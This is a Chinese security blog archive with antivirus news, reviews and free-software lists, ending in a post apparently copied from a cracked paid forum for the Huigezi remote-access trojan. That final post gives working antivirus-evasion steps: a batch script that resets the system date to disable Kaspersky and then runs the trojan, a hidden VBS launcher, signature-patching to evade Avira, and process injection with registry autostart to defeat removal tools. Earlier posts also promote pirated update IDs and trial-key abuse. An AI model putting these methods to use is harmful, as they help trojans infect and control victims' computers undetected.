Thursday, September 03, 2009
国内知名NOD32升级ID提供网站陆续被关闭
http://www.cnbeta.com/articles/92586.htm
感谢40元用一年的划算NOD32的投递
继“新生NOD32 升级ID发布网站”和"NOD321"两大NOD32 升级ID发布网站关闭后 (投递者注:今天新生再次顶住压力重开并更新了注册ID),今天又得到消息,以下NOD32升级ID发布网站正式关闭:从昨天晚上到现在已经发现有7个 NOD32 升级ID发布网站关闭了!这几个网站都是主要提供升级ID的,可以说盗版NOD32升级ID已全线关闭...
1、"NOD32sky"(http://www.nod32sky.com/)
2、"NOD32爱好者论坛"(http://bbs.nod32sj.cn/)
3、"Taomail"(http://taomail.com.cn/)
4、"NOD32升级服务"(http://www.nod32key.com/)
5、"NOD32网友平台"(http://www.nod32sj.cn/)
从他们的关闭声明中可以看出,关闭行为多少出 于无奈,大家都明白这是为什么!没有了这些升级站提供ID,为软件升级多少造成了一些不便。但是,还不能完全杜绝其他网站继续行为,毕竟在中国还存在很大的市场。
大家不妨去百度、Google搜索"NOD32",搜索结果中ESET 中国官网排名排第一,而这些被封的升级ID发布网站排名都很靠前,因此,这些网站可能成为了ESET官方的眼中钉...
据悉ESET NOD32官方为了打击盗版行为,连夜发送大量邮件给那些主要提供NOD32升级ID站的站长,要求其立即关闭,并承诺今后不在提供升级ID,否则将法律追究责任。
NOD32sky(http://www.nod32sky.com/)关闭
NOD32爱好者论坛(http://bbs.nod32sj.cn/)关闭
Taomail(http://taomail.com.cn/)关闭
NOD32升级服务(http://www.nod32key.com/)关闭
NOD32网友平台(http://www.nod32sj.cn/)关闭
Thursday, April 30, 2009
熊猫免费云杀毒软件Panda Cloud Antivirus评测
http://www.cnbeta.com/articles/83156.htm
感谢我爱红伞的投递
新闻来源:thetechherald
熊猫公司近日公布了其基于云计算的免费杀毒软件Panda Cloud Antivirus,采用了现在貌似很流行的云计算方式,熊猫称之为“集群智慧”(collective intelligence),通过分布式计算与全球社区这样的平台,将提供给广大用户完全以往的体验,熊猫如是说。它成功了吗?
软件安装界面:
1、解压中……
2、选择安装路径
3、安装
如图所示,软件的主界面相当简洁,总共只有四个标签,从任务栏打开之后看到的第一个标签即是目前系统的状态,一目了然,多余的废话没有……
设置选项卡:
从这个选项可以看出,熊猫这回是准备彻头彻尾的“云”了,所有的处理都将在“云端”完成,也就是说,在整个“云”社区之中,只要有一个用户感染了某种新型 病毒,通过这个云杀毒软件提交给云端服务器的处理和清除,社区的其他用户都将得到保护(貌似很生猛的概念,可是啊,我天朝的网络能否胜任这项艰巨的任 务……?)。
按照熊猫的说法,这种集群处理的方式也正是能够有效减少客户端资源占用的方法,因为处理工作是通过数据中心的分布式计算来完成的,因此也就降低了客户端对数据处理的压力,从而将用户计算机从无穷无尽的扫描文件签名的工作中解放出来。(……The One?)
扫描选项卡:
同样简洁,只有两个选项,扫描全部和扫描其他项目(包括单个驱动器或文件夹)。通过这两个项目可以完成杀毒软件的按需扫描(On Demand Sanning),但貌似没有计划扫描的功能。
最重要的,这个杀毒软件是有实时监控的,不过没有更多的实时监控选项,在软件检测到威胁之时会默认采取删除的操作,这个操作是可逆的,删除的文件会放在软 件内建的回收站(Recycle Bin)之中(为了和Windows的回收站区别,暂且翻译成隔离区吧),以便用户进行误删恢复。
软件回收站箭头:
如图,在每个标签页上右下角都会有个蓝色箭头,单击即可进入回收站了:
报告选项卡:
熊猫免费云杀毒软件基本评测:
The Tech Herald使用的测试平台:
硬件环境:CPU: Intel Pentium D 3.4GHz CPU (Dual Core);内存:1G
软件环境:Windows XP (SP3), Internet Explorer 7,更新所有系统补丁
===
测试:
1、hxxp://lieliteautobody.cn/load.php?id=x(安全考虑做了字符替换)
这个恶意网址包含有5个即时安装的恶意软件,当访问上述网址时,熊猫云杀毒拦截界面如下:
奇怪的是,尽管熊猫拦截到了五个恶意软件,但却都没有名字,不知道是不是还在测试的缘故。
但是,事实上在这个恶意网站中还包含了一个loader,这个loader会下载并且执行病毒,但这个loader本身却并没有被熊猫云杀毒软件列为威胁(可是啊,在Virus Total网站所做的关于loader的测试中[VT Report 04.29.2009 16:10 CET],主流40款杀毒软件只有3款报了毒,分别是CAT-QuickHeal,版本10.00、Sunbelt,版本3.2.1858.2以及VBA32,版本3.12.10.3,连我心爱的红伞都覆没了,真是搞笑啊)。
2、hxxp://y18032009.com/the/?pid=x(安全考虑做了字符替换)
在第二项测试的网页中包含一个假冒的YouTube链接,并伪装提示升级flashplayer,进而下载病毒。在这个测试中,熊猫并没有报毒,但在感染之后进行的扫描中熊猫却成功地发现了恶意软件进行了清除,并提示重启。(在Virus Total网站所做的关于本loader的测试中[[VT Report 04.29.2009 16:29 CET],这次共有13款杀毒软件成功报毒)
按照云安全的理念,当这些恶意文件被熊猫的云端服务器成功标识之后即不会再次被感染,因此,在机器重启之后尽管残留的病毒文件仍然试图运行,但被熊猫云杀毒软件成功水产。
3、加密压缩文件测试
实验室测试的病毒样本压缩包共包含39个样本,在加密状况下熊猫云杀毒并不能发现病毒,但在解压缩之后熊猫成功水产了38个病毒文件,漏掉了著名的Sality.K,但仍将其标识为“可疑”文件[VT Report 4.29.2009 17:27 CET]。该样本能够成功执行并感染系统,同样,在使用熊猫进行按需扫描之后才被水产。
第二个样本压缩包未加密,共包含50个病毒样本,绝大多数被水产,剩余的病毒文件无法执行。
在测试样本过程中,熊猫的显示结果页面出现了假死,直到所有病毒被水产。这可能是由于熊猫在发现病毒时执行大量文件操作造成的。
======
总结:
总检出率:85%
作为一个免费软件,熊猫云杀毒软件还是很有潜力的,值得关注。
熊猫云杀毒软件下载页面:http://www.cloudantivirus.com/Default.aspx?lang=eng
Labels: antivirus
Thursday, August 14, 2008
免费杀毒软件也是正版,不愁号被封
AOL免费杀软,美国在线的合作商现在是McAfee。只要注册一下就可免费下载,注册时注意必须是美国的地址邮编和电话.
地址:http://safety.aol.com/isc/BasicSecurity/
2.小红伞
英文的界面,C版免费,P版收费。启发式杀毒功能强大!C版和P版病毒库都是一样的,P版升级用专用服务器,升级快,多了个邮件监控。
地址:http://www1.avira.com/en/download/index.html
如果想用P版的话可以免费申请6个月的KEY,
申请地址:http://www1.avira.com/en/evaluate/pcworld_poland.php
想用含防火墙的安全套装可以申请3个月的KEY,
申请地址:http://www.avira.com/en/evaluate/vnu.php
3.AVG Anti-Virus Free Edition
Grisoft 公司来自捷克,自1992年成立以来,已有着十几年杀毒软件开发的经验,它的安全产品广泛地被欧美以及大洋洲地区使用。它得到了ICA实验室认证并已获 2005年Virus bulletin的VB100%奖。个人家庭用户与非盈利性质的组织可以使用免费版。
地址:http://free.grisoft.com/
4.Avast
来自捷克的Alwil公司,已有17年的历史。它专攻于安全相关的软件,开发出来的Avast!杀毒软件在国外市场一直处于领先地位。自96年以来, Avast获得的行业殊荣多达50个。其中光是Virus bulletin的VB100%奖就拿了14次,另外不仅得到了2005年ICA实验室认证还得到了微软的稳定性认证。avast! 4 Home Edition 是一个 专为家庭和非商业用途而设(两个 条件都必须符合!) 的全功能杀毒程序包.我们公司提供免费的家用杀毒软件。
地址:http://www.avast.com/cns/avast_4_home.html
5.BitDefender
BitDefender 10 Free edition是您免费使用全世界最有效防毒引擎之一的绝佳机会! BitDefender 10 使用其他BitDefender產品中ICSA Labs认证的相同扫描引擎,让您不需任何花费即可享有基本防毒保护。
地址:http://download.bitdefender.com/
6.Comodo Antivirus
这是与Comodo Firewall 同属于一间公司的另一款免费产品!Comodo AntiVirus-自动检测、杀除各种流行电脑病毒、蠕虫、木马的免费杀毒软件.支持定向检测、邮件扫描、进程监控和蠕虫屏蔽等, 它是一款免费软件,不支持9x系统.不过是英文界面的!
地址:http://antivirus.comodo.com/
7.ClamWin Free Antivirus
ClamWin 是一套功能非常优秀的免费防毒软件。它的体积非常娇小,不会占用太多计算机资源,不像其它防毒软件安装之后会拖累整台计算机的速度。而且除了强大的文件与电子邮件防护能力之外,它还拥有排程扫描、在线更新病毒码、及时侦测等功能,和市面上知名防毒软件比起来一点也不逊色!
地址:http://www.clamwin.com/
8.F-Secure
拥有四大杀毒引擎的杀毒软件 :
AVP (AVP是卡巴斯基的旧称) 文件:*.Avc 这个引擎众所周知来自卡巴实验室的授权产品 F-Secure 使用的是卡巴的引擎和病毒库;升级的进度几乎是保持一致的;不同之处在于:通常卡巴是每三小时升级一次,而 F-Secure 每天升级两次,并且周六、周日休息。
Libra(天秤座) 文件:fsmacro.def,fsscript.def 现在可以说这个应该是F-secure自己的杀毒引擎,据说这个引擎最新来自F-prot. F-Prot 的病毒库本来包括 macro.def、sign.def、sign2.def 等,从命名方式上看,显然 Libra 引擎来自冰岛的F-Prot,现在它加上了fs前缀并做了一些改动,可见F-Secure正在试图逐步脱离F-Prot的引擎打算自立门户),当然如果不严格的说,这个也是F-Secure自己的引擎
Orion(猎户座) 文件:orion.dat,orioneng.dat,orionfin.dat (这个是Heuristics Engine-启发式引擎。Orion 引擎是起源于那个公司;个人认为这个就是F-Secure公司自己的原创。)
F-Secure Draco是F-secure 引进的反间谍扫描引擎,来自LAVASOFT 公司得授权,这个大家也应该很熟悉。
F-Secure 2007官方中文版下载地址 :http://support.f-secure.com/beta/downloads/istpbeta.exe
注册方法:注册方法十分简单,打开官方网页 https://store.f-secure.com/cgi-bin/dlreg/ml=EN?ID=FSISTB 输入一个可用的邮箱,其他随意填,点击 Submit 就可以在你邮箱里拿到系列号了。目前一个号可以用三个月,无功能限制,过期后再换个邮箱。
9.NOD32
目前与pplive合作半年试用,绝对是很好的杀软,世界排名第三,监控一流,系统资源占用非常小。
地址:http://www.nod32cn.com/pplive/
10.PC Tools AntiVirus 3.1 免费版本
PC Tools AntiVirus是PCTools公司出品的一款可以防杀计算机病毒的计算机防卫工具软件。为个人电脑提供世界一流的保护,利用快速更新和OnGuard技术拦截网络病毒,蠕虫和特洛伊。
地址:http://www.pctools.com/cn/free-antivirus/
11.东方微点主动防御软件
大家都知道是怎么回事,所以可以放心的使用他的试用版,试用3个月,不过还没有正式上市之前到期之后会自然延后。
地址:http://www.micropoint.com.cn/download/index.php
12.Dr.Web CureIT!
Dr.Web出品免费工具Dr.Web CureIT! Dr.Web CureIT具有单机版Dr.Web的所有功能 ,不与任何AV冲突 。
Dr.Web CureIT从Dr.Web的FTP下载后即是当天最新病毒库封装的版本 。Dr.Web CureIT用来辅助杀毒是不二之选。
地址:http://www.freedrweb.com/cureit/
Labels: antivirus, security software
Tuesday, July 15, 2008
杀毒软件推荐
1、瑞星2008:瑞星杀毒软件2008;瑞星防火墙2008;卡卡上网安全助手。
2、卡巴斯基互联网安全套装7.0 。
3、金山毒霸2008。
4、NOD32杀毒软件。
5、江民杀毒软件。
6、微点主动防御杀毒软件。
7、赛门铁克诺顿防毒软件系列。
8、McAfee——麦咖啡防毒软件。
9、趋势杀毒软件。
10、驱逐舰杀毒软件。
二、免费杀毒软件推荐:
1、NOD32杀毒软件PPlive专用版;
2、360安全卫士。
3、Avast!4 Home Edition 杀毒软件。
4、费尔托斯特安全 + 费尔个人防火墙,费尔托斯特安全可以免费使用90天,之后需要注册。
5、360安全卫士豪华版,卡巴斯基7.0。用“360安全卫士” 获取卡巴斯基激活码,免费使用半年。
三、免费的防火墙推荐:
1、PC TOOLS Firewall Plus 防火墙;
2、EQ Secure E 盾 2007 V3.41 防火墙;
3、傲盾DDOS防火墙;
4、费尔个人防火墙;
5、Comodo Personal Firewall 防火墙。
四、免费的电脑监控软件:
百络网警家庭免费版。
★推荐使用真正免费的杀软:Avast!4 Home Edition 杀毒软件。
用邮箱免费注册,激活Avast后便可以免费升级使用14个月。
注意:必须下载家庭版,是免费的,自带防火墙。
※★我推荐的经典搭配:
Avast!4 Home Edition 杀毒软件;
超级巡警;
木马剑客(可选);
360安全卫士;
超级兔子魔法设置;
一键Ghost之U盘版(可选);
一键还原精灵;
完美卸载;
影子系统V2.6(必备)。
或是从新安装 嘿嘿
Labels: antivirus
Saturday, September 01, 2007
最近比较满意的系统安全配置
自打有了自己的电脑开始,就在不断地捣鼓各种安全软件,算来算去,将近4年了。也算是比较有经验了。一直在进行各种安全软件的配置,某段时间就用某一套设 置。国内的我比较喜欢东方微点,江民,国外的喜欢卡巴斯基,小红伞,防火墙一直用ZA,最近用COMODO。也比较幸运,从没有中过病毒,只是中了一次木 马(NOD32实在是徒有虚名,再也不用)。
目前我正在用的一套安全设置是:小红伞(最近评测仅次于卡巴斯基的杀毒软件,免费的哦)+俄罗斯大蜘蛛(绿色版,启发式杀毒还是比较牛,备用)+ COMODO(最近评测世界第一的防火墙,也是终身免费的哦)+SSM(HIPS主机防御系统中很受欢迎的一种,也算是免费的)+影子系统(系统的金刚不 坏之身,曾经很早就注册了,所以现在对我来说也是免费的)+AVG(世界第一的杀木马软件,就是升级注册很麻烦),还在考虑是否需要安装一个类似于一键还 原的东西,那就更完美了,不过就算这样我的系统也是基本不可能被搞定的了。这套方案是基于COMODO来组合的。虽说COMODO的防护性能很好,但是引 擎差了点,而且很不合群,什么卡巴斯基,东方微点,江民一系列比较牛的杀毒软件都和他有冲突,不能共存,幸好还有小红伞不冲突,谢天谢地。SSM这个东西 和EQ都存在于我的系统上,不过SSM比较稳定,所以让他随机启动,EQ就绿色了。把各种软件的应用规则在SSM和COMODO中设置全面以后,我现在基 本一开机除了必要的升级杀软之外,立刻进入影子系统里,既安全,又可以避免系统产生各种垃圾,天天都用新系统,呵呵。现在的生活是乐无边阿乐无边。我都郁 闷了。咋就没有病毒呢?
Labels: antivirus
Monday, August 13, 2007
15实用免费安全软件大搜罗
从打开PC那一刻起,我们的系统就面临来自互联网的众多危险,包括各种间谍软件攻击、病毒、特洛伊木马、主页劫持软件,还有那些企图侵入系统的黑客.而一些优秀的免费软件可以作为我们反击的工具.
从防火墙到反病毒软件再到对付rootkit和间谍软件的工具,以下这些优秀的下载软件可以保护系统免受恶意攻击.
防火墙软件:
ZoneAlarm
Check Point软件公司的ZoneAlarm很可能是世界上最受欢迎的防火墙,如今最新版本终于可以保护Vista机器了.可以这么说,ZoneAlarm这 个产品使每个人都认识到需要防火墙保护.它用起来非常容易,配置出站保护的方法也特别有用.只要某个程序试图建立出站互联网连接,ZoneAlarm就会 弹出警告信息.然后可以选择暂时性还是永久性允许连接或者禁止连接.只要移动几个滑块,即可配置保护级别,就是这么简单.虽然该软件的免费版本完全是个防 火墙,但Check Point公司还提供收费的安全套件.不过要是你寻找的仅仅是防火墙,这个免费版本就够用了.
Comodo Firewall Pro
虽然ZoneAlarm极为流行,但并不是说它就是你所能找到的最优秀的免费防火墙了.Comodo Firewall Pro就是个强有力的竞争者,独立测试网站Matousec曾把它评为最好的防火墙.Matousec发现,Comodo提供了最高级别的防泄露保护功能 (这是评估防火墙效果的一个指标).Comodo提供了真正双向的防火墙保护,具有高可配置性,还为了解系统和互联网连接的情况提供了清晰视图(这有别于 其他大多数防火墙).
Avast
是不是对臃肿庞大、价格过高的安全套件感到了厌倦?这些套件不但降低了系统的运行速度,价格还贵得要命,而实际上需要的可能只是反病毒软件.如果是这 样,就用Avast吧,这款一流的反病毒软件对家庭和个人用户而言是免费的.因为这个软件很小巧,所以给系统资源和内存带来的负担比较小.尽管如此,它能 够截杀病毒,还有许多额外功能,包括能够一开始防止病毒感染PC的实时扫描.Avast还能够扫描普通电子邮件和基于Web的电子邮件以查找病毒,另外它 还能防范即时通信病毒、点对点软件病毒及其他病毒.
AVG Anti-Rootkit
最可怕的其中一种恶意软件就是rootkit,而许多类型的反恶意软件都检测不到这种恶意软件.坏人利用rootkit把特洛伊木马隐藏起来,然后利用 木马在你毫不知情的情况下控制PC,这种情况并不少见.AVG Anti-Rootkit就是专门用来查找及清除rootkit的.启动后,它就能扫描PC,查找rootkit,并且清除找到的任何恶意软件(注意:该 实用程序无法与Windows Vista协同工作.)
Spyware Blaster
几种最烦人的间谍软件:自动拨号软件、主页劫持软件及其他恶意软件会把自己作为ActiveX控件来安装.Spyware Blaster可以保护PC远离它们,阻止恶意软件及其他类型的间谍软件通过ActiveX控件的形式来安装,并且清除跟踪性质的cookie,以免泄露 隐私.该程序可与Firefox、Opera或者IE等浏览器协同工作,并且防止浏览器跳转到危险网站.特别实用的一个特性就是该实用程序的System Snapshot(系统快照),它可以为PC拍下快照,那样一旦后来计算机受到感染,照样能返回到干净版本.
评估系统面临的风险
安全不安全?无论提问的对象是你自己的系统、想访问的网站、还是忍不住去点击的链接,都需要合适的工具帮你知道相关的风险级别.下面这些实用程序可以分析局面,并进行合理评估.
AOL Active Security Monitor
这款简单、直观的应用程序能够查看PC的安全状态、报告发现结果,并给出建议.它可以检查是否安装了反病毒软件;如果已安装,病毒定义是不是最新的.然 后它会对反间谍软件进行同样的检查,测试是否启用了防火墙,检查是否存在可能会带来危险的点对点软件.这个监控软件本身没有任何保护功能,但可以提醒用户 是否需要一些保护功能.不过要注意:该软件无法与Windows Vista协同工作.也不要完全听信它给出的建议:该软件声称像AOL Privacy Wall这些收费的AOL软件其效果好于免费软件,实际上可能不如后者.
McAfee SiteAdvisor
不像在真实世界,在网上闲逛时很难发现旁边的坏人.实际上,最漂亮、最诱人的网站可能隐藏各种各样的恶意软件.这时候,McAfee SiteAdvisor就能派上用场.如果准备访问或者已经在访问的网站可能存在危险,它就会提出警告.可以把它作为IE工具栏或者FireFox插件来 安装.这样一来,使用谷歌或者其他某种搜索引擎进行搜索时,它会在每个搜索结果旁边显示标上色码的图标,表明访问的这个网站是安全的(绿色)、有问题的 (黄色),还是明显不安全的(红色).它还会检查网站是否含有可能危险的下载件,以及是否有迹象表明:要是向网站提供电子邮件地址,它会不会发送垃圾邮 件.至于目前在访问的网站,工具栏会给出这方面的类似报告.
LinkScanner Lite
这是另一个可以确定网站是否藏有危险内容的优秀工具.打开LinkScanner Lite,输入某个网站的URL,该实用程序就会检查该网站,查找恶意脚本、恶意下载件及其他有危险的内容.它还能对网络钓鱼网站及其他可能存在欺诈的网 上操作给出警告,并且能像McAfee SiteAdvisor那样与搜索网站集成起来,把图标放在搜索结果旁边,表明这些网站是不是危险的.但是与Site Advisor不同,它并不检查网站是否藏有广告软件或者间谍软件.
Internet Threat Meter
网上似乎每天都会出现新的威胁.赛门铁克公司的Internet Threat Meter让用户可以随时了解出现的最新威胁,还提供了一个链接,指向赛门铁克的一个网站,在上面可找到更多信息和解决办法.该程序作为Windows XP中的小巧窗口组件或者作为Windows Vista中的侧边栏工具来运行,它可以搜集有关最新威胁的数据,并汇报结果.
趋势科技HijackThis
没有哪一款反间谍软件程序能够检测及清除所有的间谍软件.因此,即使是你最青睐的反恶意软件工具也不能完全保护你.要是怀疑自己已经中了间谍软件的招, 可是使用平常的诊断软件又查不出问题的根源,不妨试一试HijackThis.它能够全面分析注册表和文件设置,并且创建报告结果的日志文件.如果系统已 感染了间谍软件,这个文件就会包含相关的一些蛛丝马迹.虽然安全专家能够分析日志从而查出问题根源,但还是不要试着自己进行任何的高级分析,除非有相关专 长.只要把日志文件上传到HijackThis网站,请那里的社区帮助分析就可以了.
掩盖行踪、清除垃圾
加密隐私信息、禁用可能有害的脚本、清理不断堆积起来的碎片,这些方法都能够加强安全.下面这些下载软件可以确保系统井然有序.
Kruptos 2
是不是担心有人可能窥视电脑里最隐私的文件?Krupto 2使用功能强大的128位加密技术来加密文件和文件夹,那样只有你自己才能读取它们.它对USB闪存和可移动存储设备来说特别有用,可以采用全盘加密. Kruptos 2还可以创建经过加密的自解压文档;还能粉碎已删除文件,那样这些文件的所有痕迹就会从硬盘上消失;对文件进行加密时,它甚至还能隐藏文件名.
Transaction Guard
商业安全软件厂商趋势科技的这款免费软件其实结合了两个安全软件.首先,这款能够检测及清除间谍软件的软件可实时监控系统,查找间谍软件,并且清除发现 的任何间谍软件.第二,它采用了“秘密键盘”,确保密码及其他敏感信息不会被人在网上窃取.如果访问需要密码的网站,不要直接输入密码,应在“秘密键盘” 上输入,它会把密码拷贝到剪贴板,然后密码直接剪贴到Web表单.该软件作为ActiveX控件在系统中运行.
CCleaner
在上网浏览时,上网活动会留下很多痕迹.大量的临时文件、历史记录、cookie、自动完成记录及其他众多内容占据着PC的空间.另外,许多程序也会生 成临时文件、文件列表及其他垃圾信息.Windows本身在不断监控用户的所作所为,并且把有关信息记入日志.其实,只要窥视一下PC上的众多无用信息, 就很容易从中搜集到用户的大量信息.CCleaner能把所有类似痕迹从系统中清除出去.这不仅保护了隐私,还释放了硬盘空间.笔者第一次使用这个实用程 序时,它就删掉了多达835M的文件.
NoScript
上网浏览时面临的最大威胁之一就是,被人设下陷阱的Java、JavaScript脚本和小应用程序.不法分子可以把这些有害的代码片段伪装成有用工 具,或者在执行恶意程序时完全隐藏起来.遗憾的是,没有切实可行的办法能把好人与坏人区分开来.不过NoScript这个免费的Firefox扩展程序却 能防止所有的JavaScript和Java小应用程序运行,除非是在指定安全的网站上才可以运行.这个扩展程序显示了安全网站列表,用户可以把安全网站 添加到上面.NoScript禁止了网站上的Java或者JavaScript后,就会告诉用户.这个功能异常强大、异常灵活的工具还能阻止 Java、Flash及其他插件在你不信任的网站上运行,从而提供了额外保护.
File Shredder 2
文件删除后,是不是就从PC上消失了呢?并非如此.即使你删除了某个文件,而且清空了回收站,有些专用软件还是可以把它找回来.当然,一般来说,在删除 文件时希望它们彻底消失.File Shredder 2使用二进制数据的随机字符串覆盖任何文件或者文件夹,而且可以覆盖多次.有五种不同的清除算法可供选择,这个程序用起来也很简单:只需选择要删除的文 件,告诉该程序加以清除,这些文件就会彻底删除.
Labels: antivirus
Sunday, April 15, 2007
Cyberhawk 行为分析/主动防御 (免费)
Cyberhawk 是一款来自美国的行为分析/主动防御软件
有人把它称为外国的微点, 虽然不是很恰当, 也可以反映它对未知病毒拦截的效果不错!
它有免费版本, 不过和Pro版在一起, 安装后能够试用Pro版所有功能15天, 15天以后就自动转为免费版本.
免费版本用于拦截未知病毒完全没有问题, 只是比Pro少了Rootkit扫描, 病毒隔离和自定义规则这三个功能.
http://www.novatix.com/
官方网站, 软件都是英文的, 好在使用非常方便, 不需要进行设置就能保护系统, 所以对大家来说应该不成问题.
以下试用, 均为15天Pro试用过期后进行, 以真实反映免费版本的性能!
2个进程, 占用内存不大, 不能通过任务管理器结束, 它的服务也不能停止, 保证不被恶意程序轻松关闭
发现可疑活动, 并不意味着这个程序是病毒, 只是他的行为具有一定的恶意特征, 自己判断是否需要拦截. 一些正常的程序同样可能被它拦截到可以活动, 比如 avast!
Cyberhawk 不能替代杀毒软件, 但绝对配合杀毒软件提供更强的保护, 尤其是发现0-day病毒.
它没有病毒库, 对系统速度影响非常小, 误报也非常少, 基本感觉不到它的存在
(与微点不同, Cyberhawk在没有病毒库的情况下能够阻止大部分恶意程序, 我觉得已经做得非常优秀了)
现在我用 avast! + Cyberhawk 扫描已知病毒, 同时也拦截未知病毒!
关于Cyberhawk我想补充一下:看了很多朋友的回复,都在拿微点和 Cyberhawk做比较,我在这里想说明的是首先微点和Cyberhawk的定位不同,微点定是在新一代的主动防御杀毒软件,大家看微点的架构就知道除 了杀毒功能,微点还整合了防火墙以及其他的特色功能,已经具备了相对成熟的安全防护系统框架,也就是说基本在个人计算机上可以独立承担安全防护功能;而 Cyberhawk的定位是新一代的主动防御辅助防护软件,包括开发者都宣称是“complement补充”而不是“replacement替代”,个人 户觉的Cyberhawk的防御功能相对微点更为纯粹和精悍,尤其是资源占用几乎感觉不到它的存在(很多朋友说资源占用高,我想可能和某些杀软存在冲突, 或者系统端有问题,个人使用情况是:内存实际占用2.5M,含虚拟内存15M左右,这个水平比较稳定),所以拿小而精Cyberhawk和大而全(当然也 比较精悍)的微点硬性比较并不合适。
微点这东西,有个地方不好,让人不爽。
微点为了反盗版,使用了一个很极端的做法
它把你的注册信息,注册时间写入了硬盘的隐藏分区,即使你格式化硬盘,GHOST,重做系统后。微点依然能记住你的序列号和剩余时间
设想一下,你以后不用微点了,无论你重装多少次系统这个信息也无法消去。你加入把硬盘卖了,这个信息也可能暴露
3721再流氓,再难删,重装了系统也能删掉,而这个信息用常规方法无法删掉。如果以后所有软件都写隐藏分区,你硬盘抗的住吗?
绅博论坛有人提出这个问题后,微点专区的版主亲口承认微点格式化了一个隐藏扇区
--
xuqs:
Cyberhawk没用过,但微点说实话不是完全的主动防御,感觉他还是有病毒码技术成分。总之主动防御技术我个人并不看好,启发式技术与虚拟技术结合好,用在防御体系中,更实在一些
--
sunsun:
Cyberhawk目前用起来感觉还是有一些问题的,比如说admuncher这个软件,cyberhawk它有的时候说它是危险软件,拦截,有的时候却放过,即使你把定义为可信任,也不行,还有自己定义的规则似乎不行。
我用的是坤博的汉化破解版。
微点,俺的早过期了,如果您水平菜,还是用微点好一点
--
cuilu: 我是比较看好主动防御的,它减少了繁琐的病毒库更新,美国的主动防御软件Cyberhawk Pro2.0.1.2版与中国的微点主动防御比较起来还是中国的好用些,最起码不用破解就能看懂,但不知道哪个最先推出的,刘旭什么时候能像 Cyberhawk 这样不对家庭用户收费,什么时候才能推出正式版本?既然在>>深度>>提到主动防御,我想请大家密切关注它.
Labels: antivirus
木马灰鸽子VIP论坛文章分享,告戒大家不要迷信“杀软”
灰鸽子会员收费论坛就这么多精品帖,花100元/年办VIP根本不值得。剩下有不少帖是下载VIP免杀更新的,加壳加花工具的(可能工具里面本身就有捆绑木马供会员下载,我就不上传到清心了),还有些是外部连接下载我已经删除处理(清心不能发连接)
里面有仅次于灰鸽子作者葛军的二号人物凤凰木马鸽子主代理论坛weiwen的原创帖子,不乏对付或摧毁小红伞antivir以及卡巴斯基的方法,全部收费内容供清心网友免费学习!!!
帖子内容介绍:“灰鸽子病毒”由于所谓的“新闻联播”的报道,现已转 入地下,已经不再收VIP会员(原来成为VIP要100元/年),本人“huigezi”(原清心的“jaycn”)破解了几个VIP的ID,上灰鸽子论 坛将VIP或者有“威望”才能看的精华贴整理了一下,发到清心,供大家学习计算机安全高级知识,有一些木马“免杀”(免于杀软查杀)的技术,属“贼”对付 所谓“警察”的技术,给特别是迷信所谓“杀软”(所谓的“杀毒软件”)、“防火墙”的朋友一个警戒,属本人原创帖,我将多个鸽子VIP论坛的精华贴整理到 一起发
100%过卡巴6.0行为的方法
本帖被 weiwen 执行加亮操作(2007-04-04)
在我们新的修改版没有公布出来之前,凤凰会员暂时可用这种方法卡巴6.0的行为拦截。
1.过卡巴6.0的启动拦截的方法:如:在安装名称$(WinDir)\G_Server2006.exe改为$(WinDir)\G_Server2006去除后缀的方法。
2.过两个插入进程的提示方法:只要在高级选择中的1和3不打勾即可。
3.可以重新修改插入进程,这样就100%过卡巴的6.0行为了。
注:通常新用户修改第一步已经OK的了,因为卡巴的默认安装后是不打开进程插入监控的.
经过几天的努力..终于做出了第一次过小红伞的VIP1.23无壳鸽子
大家可以测试一下.. 可以导入配置信息(原配置信息已经删掉.运行了也没关系).
只做了小红伞的免杀..其他都没做..主要是发出来跟大家分享一下...
只能发连接...
刚改了下载连接..现在可以直接下载了!!!
修改方法简单可以这样说
加花打底/定位特征码/查出特征码为输入表的DLL的文件名(DLL文件名无法修改和移动)/ 再移动输入表信息(特征码会自动转移,很BT,红伞似乎会跟着你的变化而变化)/再找一个红伞查杀行走路线的点给NOP掉(本人找不到原理,纯粹靠试 验...原理还需要近一步研究)(因为改特征点已经无用.只能在它的"行走"路线上设卡..)
以上说法可能存在不对之处,请高人指明..
过卡吧主动防御思路
思路就是修改系统时间,达到卡巴实效,然后鸽子运行,然后再把系统时间改回来,首先要准备好你的免杀鸽子
先打开记事本,把以下代码保存为time.bat,(文字全为说明,不用复制)
@echo
set date=%date% 令参数%data%等于现在的日期,一会儿恢复时间用
date 1987-12-18 修改系统时间使卡巴监控失效
ping -n 10 127.0.0.1 等待10秒,10秒后卡巴已经挂了,
start notepad 运行程序(可以换成鸽子)
ping -n 5 127.0.0.1 等待5秒,
date %date% 改回来时间,卡巴又复活了
但是运行的那个DOS窗口实在看着不爽
我们在建个脚本,打开记事本,把以下代码保存为a.vbs
Set shell = Wscript.createobject("wscript.shell")
a = shell.run ("time.bat",0)
现在已经隐藏运行了,有条件的可以改造,甚至可以根据这个思路写个小程序
本帖最近评分记录:
凤凰币:10 (By weiwen) | 2007-02-01 11
要过葛军自家专杀很简单,配置的时候无注册,无服务,无后缀,配置出来后改进程,自定义启动方式,反正别用鸽子自带的启动方式就OK了,具体做法就是把配置好的无注册和服务的EXE做成资源,用DELPHI或VB以捆绑方式重新编译下,加入自定义开机启动方式,保证什么自己专杀也傻瓜。
配制的时只选注册表启动一项就可以过专杀
过鸽子自家专杀以及不死神鸽子的制作方法.
首先申明下,此方法需要编程基础,并非人人能掌握.
一:过葛军专杀,首先配置鸽子服务端,记住无注册,无服务,无后缀,不要隐藏进程,注射IE.配置结束后修改注射进程,注射到一些无法结束的系统 进程就行,不过虽然系统进程,但是还是能结束的,为什么?因为注射并非DLL加载,还是有相同的独立进程,经验丰富的老鸟随便就结束掉了,但是糊下菜鸟没 什么问题,上面改完的话已经过掉了IE防漏和一般的专杀,但是运行有问题,因为无启动项.下面把改好进程,测试没问题的服务端再进行免杀,免杀的方法就不 详细说了,相关教程很多,免杀完毕开始过葛军专杀,把配置好的鸽子服务端当作资源,用DELPHI或VB用资源捆绑方式,并加入自定义开机启动方式,如何 开机启动方式还是用注册表吧,写的好的话直接连卡巴主防的注册表监控都过,甚至可以领先于系统启动.到这里,葛军专杀就已经过了,不信的话自己测试去.
